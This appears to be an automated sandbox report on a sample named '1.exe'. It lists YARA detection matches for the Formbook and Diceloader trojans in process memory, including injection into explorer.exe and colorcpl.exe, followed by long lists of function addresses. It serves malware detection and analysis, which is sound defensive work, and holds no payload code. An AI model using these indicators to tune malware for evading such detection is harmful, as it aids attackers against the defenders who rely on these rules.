Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8C4D4 0_2_02C8C4D4
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8DC60 0_2_02C8DC60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00408C4B 2_2_00408C4B
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00408C50 2_2_00408C50
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041CD5A 2_2_0041CD5A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041C5E0 2_2_0041C5E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B8158 2_2_017B8158
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01720100 2_2_01720100
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E81CC 2_2_017E81CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F01AA 2_2_017F01AA
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E41A2 2_2_017E41A2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017C2000 2_2_017C2000
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EA352 2_2_017EA352
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173E3F0 2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F03E6 2_2_017F03E6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D0274 2_2_017D0274
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B02C0 2_2_017B02C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730535 2_2_01730535
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F0591 2_2_017F0591
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E2446 2_2_017E2446
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D4420 2_2_017D4420
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DE4F6 2_2_017DE4F6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730770 2_2_01730770
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01754750 2_2_01754750
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172C7C0 2_2_0172C7C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174C6E0 2_2_0174C6E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01746962 2_2_01746962
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017329A0 2_2_017329A0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017FA9A6 2_2_017FA9A6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173A840 2_2_0173A840
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01732840 2_2_01732840
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0175E8F0 2_2_0175E8F0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017168B8 2_2_017168B8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EAB40 2_2_017EAB40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E6BD7 2_2_017E6BD7
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172EA80 2_2_0172EA80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CCD1F 2_2_017CCD1F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173AD00 2_2_0173AD00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172ADE0 2_2_0172ADE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01748DBF 2_2_01748DBF
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730C00 2_2_01730C00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01720CF2 2_2_01720CF2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D0CB5 2_2_017D0CB5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A4F40 2_2_017A4F40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01750F30 2_2_01750F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D2F30 2_2_017D2F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01772F28 2_2_01772F28
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173CFE0 2_2_0173CFE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01722FC8 2_2_01722FC8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017AEFA0 2_2_017AEFA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730E59 2_2_01730E59
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EEE26 2_2_017EEE26
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EEEDB 2_2_017EEEDB
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01742E90 2_2_01742E90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017ECE93 2_2_017ECE93
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171F172 2_2_0171F172
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017FB16B 2_2_017FB16B
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0176516C 2_2_0176516C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173B1B0 2_2_0173B1B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E70E9 2_2_017E70E9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF0E0 2_2_017EF0E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DF0CC 2_2_017DF0CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017370C0 2_2_017370C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171D34C 2_2_0171D34C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E132D 2_2_017E132D
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0177739A 2_2_0177739A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D12ED 2_2_017D12ED
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174B2C0 2_2_0174B2C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017352A0 2_2_017352A0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7571 2_2_017E7571
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F95C3 2_2_017F95C3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CD5B0 2_2_017CD5B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01721460 2_2_01721460
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF43F 2_2_017EF43F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF7B0 2_2_017EF7B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01775630 2_2_01775630
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E16CC 2_2_017E16CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01739950 2_2_01739950
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174B950 2_2_0174B950
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017C5910 2_2_017C5910
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179D800 2_2_0179D800
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017338E0 2_2_017338E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFB76 2_2_017EFB76
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A5BF0 2_2_017A5BF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0176DBF9 2_2_0176DBF9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174FB80 2_2_0174FB80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A3A6C 2_2_017A3A6C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFA49 2_2_017EFA49
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7A46 2_2_017E7A46
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DDAC6 2_2_017DDAC6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CDAAC 2_2_017CDAAC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01775AA0 2_2_01775AA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D1AA3 2_2_017D1AA3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7D73 2_2_017E7D73
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E1D5A 2_2_017E1D5A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01733D40 2_2_01733D40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174FDC0 2_2_0174FDC0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A9C32 2_2_017A9C32
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFCF2 2_2_017EFCF2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFF09 2_2_017EFF09
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F3FD5 2_2_016F3FD5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F3FD2 2_2_016F3FD2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFFB1 2_2_017EFFB1
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01731F92 2_2_01731F92
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01739EB0 2_2_01739EB0
Source: C:\Windows\explorer.exe Code function: 3_2_103EE062 3_2_103EE062
Source: C:\Windows\explorer.exe Code function: 3_2_103EC2FF 3_2_103EC2FF
Source: C:\Windows\explorer.exe Code function: 3_2_103E98F9 3_2_103E98F9
Source: C:\Windows\explorer.exe Code function: 3_2_103E9902 3_2_103E9902
Source: C:\Windows\explorer.exe Code function: 3_2_103EC302 3_2_103EC302
Source: C:\Windows\explorer.exe Code function: 3_2_103EA362 3_2_103EA362
Source: C:\Windows\explorer.exe Code function: 3_2_103F05B2 3_2_103F05B2
Source: C:\Windows\explorer.exe Code function: 3_2_103EF7C7 3_2_103EF7C7
Source: C:\Windows\explorer.exe Code function: 3_2_109782FF 3_2_109782FF
Source: C:\Windows\explorer.exe Code function: 3_2_109758F9 3_2_109758F9
Source: C:\Windows\explorer.exe Code function: 3_2_1097A062 3_2_1097A062
Source: C:\Windows\explorer.exe Code function: 3_2_1097C5B2 3_2_1097C5B2
Source: C:\Windows\explorer.exe Code function: 3_2_1097B7C7 3_2_1097B7C7
Source: C:\Windows\explorer.exe Code function: 3_2_10975902 3_2_10975902
Source: C:\Windows\explorer.exe Code function: 3_2_10978302 3_2_10978302
Source: C:\Windows\explorer.exe Code function: 3_2_10976362 3_2_10976362
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0E4F6 4_2_04F0E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F12446 4_2_04F12446
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F04420 4_2_04F04420
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F20591 4_2_04F20591
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60535 4_2_04E60535
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7C6E0 4_2_04E7C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5C7C0 4_2_04E5C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60770 4_2_04E60770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E84750 4_2_04E84750
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EF2000 4_2_04EF2000
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F181CC 4_2_04F181CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F141A2 4_2_04F141A2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F201AA 4_2_04F201AA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EE8158 4_2_04EE8158
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E50100 4_2_04E50100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFA118 4_2_04EFA118
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EE02C0 4_2_04EE02C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F00274 4_2_04F00274
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F203E6 4_2_04F203E6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6E3F0 4_2_04E6E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1A352 4_2_04F1A352
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E50CF2 4_2_04E50CF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F00CB5 4_2_04F00CB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60C00 4_2_04E60C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5ADE0 4_2_04E5ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E78DBF 4_2_04E78DBF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6AD00 4_2_04E6AD00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFCD1F 4_2_04EFCD1F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1EEDB 4_2_04F1EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1CE93 4_2_04F1CE93
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E72E90 4_2_04E72E90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60E59 4_2_04E60E59
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1EE26 4_2_04F1EE26
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6CFE0 4_2_04E6CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E52FC8 4_2_04E52FC8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EDEFA0 4_2_04EDEFA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED4F40 4_2_04ED4F40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F02F30 4_2_04F02F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA2F28 4_2_04EA2F28
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E80F30 4_2_04E80F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E8E8F0 4_2_04E8E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E468B8 4_2_04E468B8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E62840 4_2_04E62840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6A840 4_2_04E6A840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E629A0 4_2_04E629A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F2A9A6 4_2_04F2A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E76962 4_2_04E76962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5EA80 4_2_04E5EA80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F16BD7 4_2_04F16BD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1AB40 4_2_04F1AB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E51460 4_2_04E51460
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F43F 4_2_04F1F43F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F295C3 4_2_04F295C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFD5B0 4_2_04EFD5B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17571 4_2_04F17571
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F116CC 4_2_04F116CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA5630 4_2_04EA5630
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F7B0 4_2_04F1F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F0E0 4_2_04F1F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F170E9 4_2_04F170E9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E670C0 4_2_04E670C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0F0CC 4_2_04F0F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6B1B0 4_2_04E6B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E9516C 4_2_04E9516C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E4F172 4_2_04E4F172
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F2B16B 4_2_04F2B16B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F012ED 4_2_04F012ED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7B2C0 4_2_04E7B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E652A0 4_2_04E652A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA739A 4_2_04EA739A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E4D34C 4_2_04E4D34C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1132D 4_2_04F1132D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FCF2 4_2_04F1FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED9C32 4_2_04ED9C32
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7FDC0 4_2_04E7FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17D73 4_2_04F17D73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E63D40 4_2_04E63D40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F11D5A 4_2_04F11D5A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E69EB0 4_2_04E69EB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E23FD2 4_2_04E23FD2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E23FD5 4_2_04E23FD5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FFB1 4_2_04F1FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E61F92 4_2_04E61F92
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1FF09 4_2_04F1FF09
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E638E0 4_2_04E638E0
